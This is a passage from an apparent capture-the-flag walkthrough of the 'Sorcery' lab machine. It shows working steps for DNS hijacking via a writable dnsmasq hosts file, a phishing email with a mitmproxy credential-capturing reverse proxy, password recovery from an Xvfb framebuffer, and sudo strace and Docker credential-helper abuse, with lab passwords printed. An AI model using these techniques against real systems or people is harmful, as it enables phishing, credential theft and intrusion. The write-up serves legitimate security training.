key=$(echo $line | awk '{ print $1 }')
values=$(echo $line | cut -d ' ' -f2-)
for value in $values; do
echo "$key $value" >> $entries_file
done
done < $hosts_fileThis script:
- Clears
/dns/entries - Reads from
/dns/hostsand/dns/hosts-user - Splits lines into key-value pairs
- Writes to
entriesas flathosts-style lines
Permissions:
/dns/hosts: root-owned, read-only/dns/hosts-user: not present/dns: writable byuser
Which means we can create /dns/hosts-user with arbitrary content.
user@7bfb70ee5b9c:/dns$ cat entries
user@7bfb70ee5b9c:/dns$ cat hosts
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
...However, we notice that there's no /dns/hosts-user file currently present, while the /dns folder itself is writable by user:
user@7bfb70ee5b9c:/dns$ ls -ld /dns
drwxr-xr-x 1 user user 4096 Apr 28 12:07 /dnsThis means we can create /dns/hosts-user with content of our choice (as user), and when convert.sh is executed, our controlled content will be processed.
Dnsmasq
Environment confirms it's running as a supervised service:
user@7bfb70ee5b9c:/app$ env
...
SUPERVISOR_GROUP_NAME=dns
PWD=/app
SUPERVISOR_PROCESS_NAME=dns
SUPERVISOR_ENABLED=1And we now know /dns/convert.sh parses two files: /dns/hosts and /dns/hosts-user. The script output format is exactly like a hosts file:
127.0.0.1 git.sorcery.htbThe user running the reverse shell is user, not nobody, so it's inside a service container. And we can inspect users via /etc/passwd:
user@7bfb70ee5b9c:/app$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
user:x:1001:1001::/home/user:/usr/sbin/nologin
dnsmasq:x:101:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologinWe see a user dnsmasq, which is a lightweight DNS forwarder and DHCP server, often used in embedded systems or containers. It:
- Resolves DNS queries (can forward to upstream DNS or serve local entries)
- Can read from a hosts-style file to serve custom DNS records (e.g., from
/etc/hostsor custom file) - Supports static mappings like
127.0.0.1 git.sorcery.htb
Additionally, we can check running processes:
user@7bfb70ee5b9c:/dns$ ps -ef | grep dnsmasq
user 10 7 0 11:07 ? 00:00:00 /usr/sbin/dnsmasq --no-daemon --addn-hosts /dns/hosts-user --addn-hosts /dns/hosts
user 48 27 0 12:24 pts/0 00:00:00 grep dnsmasqBingo, we see dnsmaskq is exactly reading those 2 host files:
dnsmasq --no-daemon --addn-hosts /dns/hosts-user --addn-hosts /dns/hostsWhich means:
- It's using both
hosts-userandhostsfiles as DNS sources - Since we own
/dns/hosts-user— we own the DNS mapping
Dns Poisoning
This means we can create a host file hosts-user.
Our next target will be the user who runs the convert.sh, as indicated in the Rust source code (Ref-Hook-13), and relies on the DNS parsing file by the generated entries file.
Write to /dns/hosts-user:
echo '10.10.13.3 giteas.sorcery.htb' > /dns/hosts-userTrigger the regeneration:
/dns/convert.shThis creates the entries file:
user@7bfb70ee5b9c:/dns$ tail entries
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
10.10.13.3 giteas.sorcery.htbNext we need to force dnsmasq to resolve DNS according to our settings. We can run:
pkill dnsmasqAs it was run by user. To make sure it will restart and load the configs, run again:
user@7bfb70ee5b9c:/dns$ dnsmasq --no-daemon --addn-hosts /dns/hosts-user --addn-hosts /dns/hosts &
dnsmasq: started, version 2.89 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt DBus no-UBus i18n IDN2 DHCP DHCPv6 no-Lua TFTP conntrack ipset nftset auth cryptohash DNSSEC loop-detect inotify dumpfile
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 127.0.0.11#53
dnsmasq: read /etc/hosts - 9 names
dnsmasq: read /dns/hosts - 22 names
dnsmasq: read /dns/hosts-user - 1 namesNow we can verify if we successfully hijack DNS record with:
dig @127.0.0.1 giteas.sorcery.htbJackpot:

Mailhog
We previously identified an internal mail service and a bot, confirmed again by querying DNS runtime mappings:
user@7bfb70ee5b9c:/dns$ getent hosts mail
172.19.0.10 mail
user@7bfb70ee5b9c:/dns$ getent hosts mail_bot
172.19.0.5 mail_botPorts 1025 and 8025 are exposed on 172.19.0.10 — this strongly suggests MailHog or MailDev.
| Port | Common Use |
|---|---|
| 1025 | Fake SMTP server (inbound) — listens for emails |
| 8025 | Web UI for reading received emails |
Probe the MailHog web UI from within the container:
/tmp/busybox wget -qO- http://172.19.0.10:8025It responds with:
<!DOCTYPE html>
<html ng-app="mailhogApp">
<head>
<title>MailHog</title>
<meta charset="utf-8">
...
</body>
</html>That confirms: MailHog is active on http://172.19.0.10:8025:

We can now query MailHog's API:
user@7bfb70ee5b9c:/dns$ /tmp/busybox wget -qO- http://172.19.0.10:8025/api/v2/messages
{"total":0,"count":0,"start":0,"items":[]}No emails yet — inbox is clean.
Mail bot
We also have a mail_bot container at 172.19.0.5. As the name implies, it likely simulates a target user, such as tom_summers, clicking phishing links from emails — very CTF purpose.
Time to bait the hook.
Craft a phishing message — mail.txt:
From: [email protected]
To: [email protected]
Subject: Please verify your account
Hi Tom,
We detected unusual activity in your Gitea account.
Please verify your account to avoid suspension:
https://giteas.sorcery.htb/user/login
Regards,
Infosec Team Ready for injection.
Phishing
Everything is set — time to launch the phish.
First, we configure mitmproxy with our forged cert for giteas.sorcery.htb:
pip install mitmproxy
cat giteas.crt giteas.key > giteas.pem
mitmproxy \
--mode reverse:https://git.sorcery.htb \
--certs giteas.sorcery.htb=giteas.pem \
--save-stream-file mitm_traffic \
--ssl-insecure \
--listen-port 443We're now impersonating the legitimate Gitea (https://git.sorcery.htb) over HTTPS — ready to intercept.
Ensure
/etc/proxychains.confpoints to our local chisel tunnel:socks5 127.0.0.1 1080
Use swaks over proxychains to drop the crafted bait:
proxychains swaks \
--to [email protected] \
--from [email protected] \
--server 172.19.0.10:1025 \
--header "Subject: Please verify your account" \
--body @mail.txtThe trap is set. And Tom bites:

His browser connects to us — our reverse proxy MITMs the real Gitea:

And then — the golden line:
POST https://git.sorcery.htb/user/login
<< Client disconnected.The victim submitted credentials — but the backend rejected it (password reset by the Infosec team). Doesn't matter. We have the POST data.
Use mitmdump to parse mitm_traffic:, with the following script extract_login.py:
from mitmproxy import io
from mitmproxy.exceptions import FlowReadException
with open("mitm_traffic", "rb") as logfile:
freader = io.FlowReader(logfile)
try:
for flow in freader.stream():
if flow.request.method == "POST" and "/login" in flow.request.path:
print("[+] POST to:", flow.request.pretty_url)
print("[+] Headers:")
print(flow.request.headers)
print("[+] Body:")
print(flow.request.get_text())
print("=" * 50)
except FlowReadException as e:
print("Flow file error:", e)Run it with mitmdump:
mitmdump -nr mitm_traffic -s extract_login.pyJackpot:

Stolen credentials:
username:tom_summers
password:jNsMKQ6k2.XDMPu.Though his Gitea access was revoked, the password still works for SSH login:

This gives us a solid user shell — and the user flag.
ROOT
Remember the internal gitea server opens port 22 excepts 3000, we can assume it's the next move to root.
tom_summers@main:~$ ls /home
rebecca_smith tom_summers tom_summers_admin user vagrantInternal Enum
LinPEAS
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root:
tom_sum+ 1442 0.0 0.7 227012 60772 ? S 06:26 0:00 /usr/bin/Xvfb :1 -fbdir /xorg/xvfb -screen 0 512x256x24 -nolisten local
...
root 465317 0.0 0.1 28444 11776 ? Ss 11:05 0:00 /usr/sbin/sssd -i --logger=files
root 465328 0.0 0.2 95348 21376 ? S 11:05 0:00 _ /usr/libexec/sssd/sssd_be --domain sorcery.htb --uid 0 --gid 0 --logger=files
root 465353 0.4 0.5 61732 47744 ? S 11:05 0:02 _ /usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files
root 465354 0.0 0.1 29620 14080 ? S 11:05 0:00 _ /usr/libexec/sssd/sssd_pam --uid 0 --gid 0 --logger=files
root 465355 0.0 0.1 27604 11008 ? S 11:05 0:00 _ /usr/libexec/sssd/sssd_ssh --uid 0 --gid 0 --logger=files
root 465356 0.0 0.1 27468 11008 ? S 11:05 0:00 _ /usr/libexec/sssd/sssd_sudo --uid 0 --gid 0 --logger=files
root 465357 0.0 0.1 73048 16128 ? S 11:05 0:00 _ /usr/libexec/sssd/sssd_pac --uid 0 --gid 0 --logger=files
╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user
Proc 634 with ppid 1 is run by user systemd-resolve but the ppid user is root
Proc 651 with ppid 642 is run by user _laurel but the ppid user is root
Proc 835 with ppid 1 is run by user messagebus but the ppid user is root
Proc 1422 with ppid 1411 is run by user tom_summers_admin but the ppid user is root
Proc 1434 with ppid 1 is run by user _chrony but the ppid user is root
Proc 1442 with ppid 1 is run by user tom_summers_admin but the ppid user is root
...
╔══════════╣ Hostname, hosts and DNS
main.sorcery.htb
127.0.0.1 localhost main.sorcery.htb sorcery sorcery.htb
127.0.1.1 ubuntu-2404
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.23.0.2 dc01.sorcery.htb
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
br-24ea6f65bc59: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.21.0.1 netmask 255.255.0.0 broadcast 172.21.255.255
inet6 fe80::44c4:7bff:fe7e:eafc prefixlen 64 scopeid 0x20<link>
ether 46:c4:7b:7e:ea:fc txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
br-3ff4274bb73e: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.23.0.1 netmask 255.255.0.0 broadcast 172.23.255.255
inet6 fe80::404f:23ff:feea:8d2e prefixlen 64 scopeid 0x20<link>
ether 42:4f:23:ea:8d:2e txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
br-9ea714ea7b8c: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.19.0.1 netmask 255.255.0.0 broadcast 172.19.255.255
inet6 fe80::6c71:a2ff:fefb:bc3c prefixlen 64 scopeid 0x20<link>
ether 6e:71:a2:fb:bc:3c txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
ether 5e:ae:52:18:10:79 txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.255.204 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 dead:beef::250:56ff:feb0:3147 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb0:3147 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b0:31:47 txqueuelen 1000 (Ethernet)
RX packets 25382 bytes 2651691 (2.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7097 bytes 774435 (774.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
...
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:636 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:88 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:389 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:464 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::443 :::* LISTEN -
╔══════════╣ Users with console
rebecca_smith:x:2003:2003::/home/rebecca_smith:/usr/bin/bash
root:x:0:0:root:/root:/bin/bash
tom_summers:x:2001:2001::/home/tom_summers:/usr/bin/bash
tom_summers_admin:x:2002:2002::/home/tom_summers_admin:/usr/bin/bash
user:x:1000:1000:user:/home/user:/bin/bash
vagrant:x:1001:1001::/home/vagrant:/usr/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),101(lxd)
uid=106(sssd) gid=105(sssd) groups=105(sssd)
uid=107(dockremap) gid=106(dockremap) groups=106(dockremap)
uid=1001(vagrant) gid=1001(vagrant) groups=1001(vagrant)
uid=2001(tom_summers) gid=2001(tom_summers) groups=2001(tom_summers)
uid=2002(tom_summers_admin) gid=2002(tom_summers_admin) groups=2002(tom_summers_admin)
uid=2003(rebecca_smith) gid=2003(rebecca_smith) groups=2003(rebecca_smith)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
...
╔══════════╣ Searching kerberos conf files and tickets
╚ http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory
kadmin was found on /usr/bin/kadmin
kadmin was found on /usr/bin/kinit
klist execution
klist: Credentials cache keyring 'persistent:2001:2001' not found
ptrace protection is disabled (0), you might find tickets inside processes memory
-rw-r--r-- 1 root root 789 Jun 17 11:05 /etc/krb5.conf
#File modified by ipa-client-install
includedir /etc/krb5.conf.d/
[libdefaults]
default_realm = SORCERY.HTB
dns_lookup_realm = false
rdns = false
dns_lookup_realm = false 04:16:40 [472/1672]
rdns = false
dns_canonicalize_hostname = false
dns_lookup_kdc = true
ticket_lifetime = 24h
forwardable = true
udp_preference_limit = 0
default_ccache_name = KEYRING:persistent:%{uid}
[realms]
SORCERY.HTB = {
kdc = dc01.sorcery.htb:88
master_kdc = dc01.sorcery.htb:88
admin_server = dc01.sorcery.htb:749
kpasswd_server = dc01.sorcery.htb:464
default_domain = sorcery.htb
pkinit_anchors = FILE:/var/lib/ipa-client/pki/kdc-ca-bundle.pem
pkinit_pool = FILE:/var/lib/ipa-client/pki/ca-bundle.pem
}
[domain_realm]
.sorcery.htb = SORCERY.HTB
sorcery.htb = SORCERY.HTB
main.sorcery.htb = SORCERY.HTB
-rw-r--r-- 1 root root 192 Oct 23 2024 /usr/lib/x86_64-linux-gnu/sssd/conf/sssd.conf
[sssd]
domains = shadowutils
[nss]
[pam]
[domain/shadowutils]
id_provider = proxy
proxy_lib_name = files
auth_provider = proxy
proxy_pam_target = sssd-shadowutils
proxy_fast_alias = True
tickets kerberos Not Found
klist Not Found
╔══════════╣ Analyzing FreeIPA Files (limit 70)
╚ https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting
drwxr-xr-x 3 root root 4096 Oct 30 2024 /etc/ipa
-rw-r--r-- 1 root root 230 Oct 30 2024 /etc/ipa/default.conf
#File modified by ipa-client-install
[global]
basedn = dc=sorcery,dc=htb
realm = SORCERY.HTB
domain = sorcery.htb
server = dc01.sorcery.htb
host = main.sorcery.htb
xmlrpc_uri = https://dc01.sorcery.htb/ipa/xml
enable_ra = True
-rwxr-xr-x 1 root root 987 Apr 12 2024 /usr/bin/ipa
drwxr-xr-x 3 root root 4096 Oct 30 2024 /usr/lib/ipa
drw-r-xr-x 2 root root 4096 Apr 12 2024 /usr/share/bash-completion/completions/ipa
drwxr-xr-x 3 root root 4096 Oct 30 2024 /usr/share/ipa
drwxr-xr-x 2 root root 4096 Jun 9 13:10 /usr/src/linux-headers-6.8.0-60/drivers/net/ipa
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
/usr/bin/dockerd-rootless.sh
/usr/bin/dockerd-rootless-setuptool.sh
/usr/bin/rescan-scsi-bus.sh
╔══════════╣ Unexpected in /opt (usually empty)
total 16
drwxr-xr-x 4 root root 4096 Apr 24 12:57 .
drwxr-xr-x 25 root root 4096 Apr 28 12:11 ..
drwx--x--x 4 root root 4096 Oct 31 2024 containerd
drwx------ 2 admin admins 4096 Apr 25 12:43 scripts
╔══════════╣ Unexpected in root
/bin.usr-is-merged
/xorg
/sbin.usr-is-merged
/lib.usr-is-merged
/provision
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /etc/ipa/nssdb/cert9.db: SQLite 3.x database, last written using SQLite version 3045001, file counter 3, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 3
Found /etc/ipa/nssdb/key4.db: SQLite 3.x database, last written using SQLite version 3045001, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3045001, file counter 5, database pages 8, cookie 0x4, schema 4, UTF-8, version-valid-for
5
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-r--r--r-- 1 tom_summers_admin tom_summers_admin 11 Jun 17 06:26 /tmp/.X1-lock
-rw-r--r-- 1 root root 2221 Apr 28 07:56 /var/backups/alternatives.tar.1.gz
-rw-r--r-- 1 root root 32 Mar 31 17:53 /var/backups/dpkg.arch.4.gz
-rw-r--r-- 1 root root 32 Jun 9 12:53 /var/backups/dpkg.arch.2.gz
-rw-r--r-- 1 root root 32 Oct 31 2024 /var/backups/dpkg.arch.6.gz
-rw-r--r-- 1 root root 32 Apr 28 07:56 /var/backups/dpkg.arch.3.gz
-rw-r--r-- 1 root root 0 Jun 17 06:26 /var/backups/dpkg.arch.0
-rw-r--r-- 1 root root 1482 Sep 25 2024 /var/backups/alternatives.tar.4.gz
-rw-r--r-- 1 root root 2152 Mar 19 14:50 /var/backups/alternatives.tar.3.gz
-rw-r--r-- 1 root root 2214 Mar 31 17:53 /var/backups/alternatives.tar.2.gz
-rw-r--r-- 1 root root 40960 Jun 10 19:17 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 32 Mar 19 14:50 /var/backups/dpkg.arch.5.gz
-rw-r--r-- 1 root root 32 Jun 10 19:17 /var/backups/dpkg.arch.1.gzWe have a lot valuable findings.
System Overview
- Hostname:
main.sorcery.htb - Domain:
SORCERY.HTB - IP addresses:
eth0:10.129.255.204(public)docker0:172.17.0.1- Other Docker bridges:
172.19.0.1,172.21.0.1,172.23.0.1
- Domain Controller:
dc01.sorcery.htb(seen in/etc/hostsand FreeIPA configs) - Local listening services:
- Kerberos-related ports:
88,389,636,464 - HTTPS:
443 - HTTP (locally):
5000 - DNS:
127.0.0.53:53,127.0.0.54:53
- Kerberos-related ports:
Users
user has sudo and lxd permissions. And some interesting accounts are listed:
rootuser(sudoer, part oflxd)tom_summerstom_summers_adminrebecca_smithvagrant
Potential lateral movement users: tom_summers, tom_summers_admin (unusual process parents), rebecca_smith.
Processes
Notable sssd (System Security Services Daemon) Processes:
sssdis active with submodules:sssd_be,sssd_pam,sssd_nss, etc.
- It's configured to connect with FreeIPA or a remote LDAP provider (
/etc/krb5.conf,/etc/ipa/,/usr/libexec/sssd/...). - Hints:
- This may tie into Active Directory or FreeIPA-based Kerberos authentication.
- Investigate credential caching, misconfigurations, or stored tickets.
Xvfb | tom_summers_admin
This process:
/usr/bin/Xvfb :1 -fbdir /xorg/xvfb -screen 0 512x256x24 -nolisten localruns as a non-root user but with parent process owned by root → extremely suspicious and flagged by LinPEAS directly:

Check /xorg/xvfb directory for writable files or exposed sockets (.X11-unix/X1).
FreeIPA & Kerberos
Files Found:
/etc/krb5.conf/etc/ipa/default.conf/etc/ipa/nssdb/{cert9.db,key4.db}/usr/bin/ipa
Note:
- FreeIPA XML-RPC API:
https://dc01.sorcery.htb/ipa/xml ipa-client-installhas been run, this host is an enrolled FreeIPA client.
Directories & Files
/opt/scripts:
- Owned by:
admin:admins - Permission:
drwx------(onlyadminuser can access) - Potential custom scripts or secrets.
/tmp/.X1-lock (from Xvfb):
- Used to lock the
:1display. - Check if
.X11-unix/X1exists and is writable to possibly hijack the X11 session (or keylogging/sniffing).
Services/Ports
| Port | Service | Notes |
|---|---|---|
| 443 | HTTPS | Public and localhost |
| 88 | Kerberos | Local only |
| 389 | LDAP | Local only |
| 636 | LDAPS | Local only |
| 5000 | HTTP (Flask?) | Local only |
| 464 | Kerberos kpasswd | Local only |
All Kerberos/LDAP services are bound to localhost, hinting this is a Kerberos/LDAP client, not server.
Xvfb
X Virtual Framebuffer
During post-exploitation, we identified that the user tom_summers_admin was running a virtual X server:
/usr/bin/Xvfb :1 -fbdir /xorg/xvfb -screen 0 512x256x24Xvfb (X Virtual Framebuffer) is a headless display server — like a fake monitor that runs GUI apps without a real screen.
-fbdir /xorg/xvfbmeans Xvfb will create a memory-mapped file at/xorg/xvfb/Xvfb_screen0- Xvfb directly writes the framebuffer of screen 0 into that file
- Dimensions:
512 x 256with 24-bit color depth (i.e., 3 bytes per pixel, RGB) - Calculated raw frame size:
512 * 256 * 3 = 393216bytes - Observed file size:
527520bytes → That’s 134304 bytes larger than expected
Xvfb_screen0 is a raw framebuffer where graphical content (e.g., browser window, terminal, GUI login) is dumped. This means tom_summers_admin is likely running a GUI app in the background, and Xvfb is recording it.
Framebuffer Extraction
The framebuffer output is being dumped to:
tom_summers@main:~$ ls -l /xorg/xvfb/Xvfb_screen0
-rwxr--r-- 1 tom_summers_admin tom_summers_admin 527520 Jun 17 06:26 /xorg/xvfb/Xvfb_screen0This is a raw framebuffer file, and likely contains graphical data from the virtual X session. If tom_summers_admin is interacting with GUI apps (e.g. browsers, terminals, password prompts), this file could leak sensitive info such as typed credentials, web activity, or desktop apps.
However, the actual file size is 527520 bytes (much larger than 393216 as expected), indicating that it contains metadata or is in a structured format rather than raw RGB.
To inspect the file format, we first download the framebuffer to our attack machine:
scp [email protected]:/xorg/xvfb/Xvfb_screen0 .Running a hexdump and string analysis reveals a classic XWD (X Window Dump) header:
$ hexdump -C Xvfb_screen0 | head
00000000 00 00 00 a0 00 00 00 07 00 00 00 02 00 00 00 18 |................|
00000010 00 00 02 00 00 00 01 00 00 00 00 00 00 00 00 00 |................|
00000020 00 00 00 20 00 00 00 00 00 00 00 20 00 00 00 20 |... ....... ... |
00000030 00 00 08 00 00 00 00 04 00 ff 00 00 00 00 ff 00 |................|
00000040 00 00 00 ff 00 00 00 08 00 00 01 00 00 00 01 00 |................|
00000050 00 00 02 00 00 00 01 00 00 00 00 00 00 00 00 00 |................|
00000060 00 00 00 00 58 76 66 62 20 6d 61 69 6e 2e 73 6f |....Xvfb main.so|
00000070 72 63 65 72 79 2e 68 74 62 3a 31 2e 30 00 00 00 |rcery.htb:1.0...|
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|is a classic XWD hostname string field, confirming — This is a valid xwd file, even though it's named Xvfb_screen0.
The first few hex lines match the
xwdfileheaderstructure:Cstruct xwd_file_header { CARD32 header_size; CARD32 file_version; CARD32 pixmap_format; CARD32 pixmap_depth; CARD32 pixmap_width; CARD32 pixmap_height; ... };Our data:
00000000 00 00 00 a0 → header_size = 0xa0 = 160 bytes 00000004 00 00 00 07 → file_version = 7 00000008 00 00 00 02 → pixmap_format = 2 (ZPixmap) 0000000c 00 00 00 18 → pixmap_depth = 24 00000010 00 00 02 00 → width = 512 00000014 00 00 01 00 → height = 256
Since this is an XWD file, it can be directly converted using ImageMagick:
magick Xvfb_screen0 out.pngJackpot:

Password retrieved for user tom_summers_admin:
dWpuk7cesBjT-SSH login as the new privileged user:

Sudo
Check sudo priv on tom_summer_admin:
tom_summers_admin@main:~$ sudo -l
Matching Defaults entries for tom_summers_admin on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User tom_summers_admin may run the following commands on localhost:
(rebecca_smith) NOPASSWD: /usr/bin/docker login
(rebecca_smith) NOPASSWD: /usr/bin/strace -s 128 -p [0-9]*User tom_summers_admin can run the following as rebecca_smith without a password:
docker login
This allows us to interactive login to a Docker registry, by specifying the credential store in $HOME/.docker/config.json to tell the Docker Engine to use it. Details can be referred to the official document.
It seems not immediately useful, but important if:
- Docker daemon is available to
rebecca_smith - Docker is configured with root access (default)
As we test the command:
sudo -u rebecca_smith /usr/bin/docker login
This message reveals that docker login is still being executed as rebecca_smith, but the command fails to access the Docker daemon socket.
But it tries to authenticate with existing credentials of rebecca_smith, which means it accessed and processed the stored credentials.
strace -p
This is highly sensitive, it allows attaching strace to any process owned by rebecca_smith (-s 128: ensures longer strings are captured, up to 128 bytes).
straceuses theptrace()syscall, which:
- Allows one process (the tracer) to observe and control another (the tracee)
- Can intercept syscalls, inspect arguments, and even change return values
For example, when we attach to a process doing
execve("/bin/bash", ...),strace(the tracer) sees that syscall before it executes, and can log or even modify it.
We can abuse the ability to run:
sudo -u rebecca_smith /usr/bin/strace -s 128 -p [PID]This means if rebecca_smith runs anything interactive we can snoop into it.
Hold on, anything interactive? How about, when we run
docker loginthat spawns a login prompt asrebecca_smith?
Docker Registry
Pspy
We can run pspy to monitor process and filesystem access record:

It leaks:
htpasswd -Bbc /home/vagrant/source/registry/auth/registry.password rebecca_smith -7eAZDp9-f9mg310463-B: Use bcrypt for hashing the password.-b: Use the password from the command line (not interactive).-c: Create the file or overwrite it.
htpasswd is a command-line utility that comes with the Apache HTTP Server tools — Its job is to create and manage basic HTTP authentication password files.
-7eAZDp9-f9mgis the password, while310463is the appended OTP used to login the BASIC auth Docker Registry.
The root user overwrites the file registry.password and store credentials for user rebecca_smith with password -7eAZDp9-f9mg310463, using bcrypt hashing.
registry.password is a basic auth credential database for some web service — and based on the path:
/home/vagrant/source/registry/auth/registry.passwordIt is very likely for a Docker Registry running in a private environment.
This is very likely an unintended way.
Docker Credential Helper
Under the home directory of tom_summer_admin, we see a suspicious hidden path .docker:
tom_summers_admin@main:~$ ls -l .docker/config.json
-rw-r--r-- 1 700 tom_summers_admin 32 Oct 30 2024 .docker/config.json
tom_summers_admin@main:~$ cat .docker/config.json
{ "credsStore": "docker-auth" }This config line tells Docker to use a credential store helper named (The value of the config property should be the suffix of the program to use, i.e. everything after docker-credential-):
docker-credential-docker-authDuring docker login, Docker will execute:
/usr/bin/docker-credential-docker-auth getas the current user — in this case, as rebecca_smith when invoked via:
sudo -u rebecca_smith /usr/bin/docker loginWe can inspect this /usr/bin/docker-credential-docker-auth file:
tom_summers_admin@main:~$ which docker-credential-docker-auth
/usr/bin/docker-credential-docker-auth
tom_summers_admin@main:~$ ls -l /usr/bin/docker-credential-docker-auth
-rwxr-x--- 1 rebecca_smith tom_summers_admin 67189841 Apr 6 13:58 /usr/bin/docker-credential-docker-authThis means:
- The file is owned by
rebecca_smith - The group is
tom_summers_admin
It's executable, but not writable for user tom_summers_admin. Since this invoked during docker login, responsible for handling credential storage and retrieval, we can extract rebecca_smith’s login password/token when docker login calls this helper.
Docker CLI uses credential helpers like this:
Bashdocker-credential-<credsStore> get docker-credential-<credsStore> store docker-credential-<credsStore> eraseWhen we run:
Bashsudo -u rebecca_smith /usr/bin/docker loginDocker passes our typed username and password to the helper binary, like so:
Bashecho '{"ServerURL":"http://127.0.0.1:5000/v2"}' | docker-credential-docker-auth getThe helper reads the JSON from stdin. Then it looks up the stored credential (or asks for it) and returns plaintext like:
JSON{ "Username": "rebecca_smith", "Secret": "-7eAZDp9-f9mg310463" }To verify our auth request.
Port 5000
We see port 5000 open from the LinPEAS result.
tom_summers_admin@main:~$ which docker-credential-docker-auth
/usr/bin/docker-credential-docker-auth
tom_summers_admin@main:~$ ls -l /usr/bin/docker-credential-docker-auth
-rwxr-x--- 1 rebecca_smith tom_summers_admin 67189841 Apr 6 13:58 /usr/bin/docker-credential-docker-authThis confirms it is a private Docker Registry. This means a local registry is listening, and responding properly.
Reversing
We can test the docker credential helper:
echo '{"ServerURL":"127.0.0.1:5000"}' | /usr/bin/docker-credential-docker-auth getError pops out:
Unhandled exception. System.UnauthorizedAccessException: Access to the path '/home/rebecca_smith/.docker/creds' is denied. ---> System.IO.IOException: Permission denied --- End of inner exception stack trace --- at Interop.ThrowExceptionForIoErrno(ErrorInfo errorInfo, String path, Boolean isDirError) …
It's trying to read a file:
/home/rebecca_smith/.docker/credsWe can't read it as tom_summers_admin, so the program crashes with:
UnauthorizedAccessExceptionSince we can read /usr/bin/docker-credential-docker-auth and group owner, we can download this binary for inspection:
scp [email protected]:/usr/bin/docker-credential-docker-auth .Due to this is a .Net binary, open it in dotPeek:
using Microsoft.CSharp.RuntimeBinder;
using Mono.Unix;
using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.CompilerServices;
using System.Security.Cryptography;
using System.Text.Json;
#nullable enable
if (args.Length != 1)
{
Console.Error.WriteLine("Invalid arguments.");
}
else
{
